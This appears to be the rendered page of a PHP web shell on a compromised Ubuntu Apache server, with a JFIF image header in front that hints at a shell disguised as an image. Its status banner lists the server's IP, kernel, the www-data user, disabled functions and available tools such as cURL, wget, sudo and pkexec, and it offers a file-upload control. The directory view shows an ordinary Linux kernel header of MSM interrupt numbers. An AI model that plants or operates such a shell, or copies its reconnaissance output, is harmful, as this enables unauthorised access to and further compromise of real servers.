????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.137.142.253 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /lib/modules/3.13.0-35-generic/build/arch/arm/mach-msm/include/mach/ |
Upload File : |
/* * Copyright (C) 2007 Google, Inc. * Copyright (c) 2009, Code Aurora Forum. All rights reserved. * Author: Brian Swetland <swetland@google.com> */ #ifndef __ASM_ARCH_MSM_IRQS_7X00_H #define __ASM_ARCH_MSM_IRQS_7X00_H /* MSM ARM11 Interrupt Numbers */ /* See 80-VE113-1 A, pp219-221 */ #define INT_A9_M2A_0 0 #define INT_A9_M2A_1 1 #define INT_A9_M2A_2 2 #define INT_A9_M2A_3 3 #define INT_A9_M2A_4 4 #define INT_A9_M2A_5 5 #define INT_A9_M2A_6 6 #define INT_GP_TIMER_EXP 7 #define INT_DEBUG_TIMER_EXP 8 #define INT_UART1 9 #define INT_UART2 10 #define INT_UART3 11 #define INT_UART1_RX 12 #define INT_UART2_RX 13 #define INT_UART3_RX 14 #define INT_USB_OTG 15 #define INT_MDDI_PRI 16 #define INT_MDDI_EXT 17 #define INT_MDDI_CLIENT 18 #define INT_MDP 19 #define INT_GRAPHICS 20 #define INT_ADM_AARM 21 #define INT_ADSP_A11 22 #define INT_ADSP_A9_A11 23 #define INT_SDC1_0 24 #define INT_SDC1_1 25 #define INT_SDC2_0 26 #define INT_SDC2_1 27 #define INT_KEYSENSE 28 #define INT_TCHSCRN_SSBI 29 #define INT_TCHSCRN1 30 #define INT_TCHSCRN2 31 #define INT_GPIO_GROUP1 (32 + 0) #define INT_GPIO_GROUP2 (32 + 1) #define INT_PWB_I2C (32 + 2) #define INT_SOFTRESET (32 + 3) #define INT_NAND_WR_ER_DONE (32 + 4) #define INT_NAND_OP_DONE (32 + 5) #define INT_PBUS_ARM11 (32 + 6) #define INT_AXI_MPU_SMI (32 + 7) #define INT_AXI_MPU_EBI1 (32 + 8) #define INT_AD_HSSD (32 + 9) #define INT_ARM11_PMU (32 + 10) #define INT_ARM11_DMA (32 + 11) #define INT_TSIF_IRQ (32 + 12) #define INT_UART1DM_IRQ (32 + 13) #define INT_UART1DM_RX (32 + 14) #define INT_USB_HS (32 + 15) #define INT_SDC3_0 (32 + 16) #define INT_SDC3_1 (32 + 17) #define INT_SDC4_0 (32 + 18) #define INT_SDC4_1 (32 + 19) #define INT_UART2DM_RX (32 + 20) #define INT_UART2DM_IRQ (32 + 21) /* 22-31 are reserved */ #define NR_MSM_IRQS 64 #define NR_GPIO_IRQS 122 #define NR_BOARD_IRQS 64 #endif